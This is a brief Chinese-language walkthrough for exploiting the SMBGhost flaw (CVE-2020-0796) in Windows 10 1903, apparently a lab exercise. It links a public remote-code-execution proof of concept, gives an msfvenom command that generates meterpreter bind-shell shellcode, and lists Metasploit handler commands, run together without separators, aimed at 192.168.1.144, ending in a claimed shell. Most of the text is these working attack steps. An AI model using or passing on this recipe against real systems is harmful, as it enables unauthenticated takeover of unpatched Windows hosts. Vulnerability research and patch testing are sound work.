该漏洞是由SMBv3处理恶意制作的压缩数据包,未经认证攻击者可能利用此漏洞执行任意代码。
测试环境及工具:
windows10 1903 64位下载:
http://xz1.yes025.com/iso/cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso
CVE-2020-0796 "poc"下载:
https://github.com/chompie1337/SMBGhost_RCE_PoC
生产反向木马链接
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
msf监听
use exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset lport 4444set rhost 192.168.1.144run
poc替换
成功getshell
end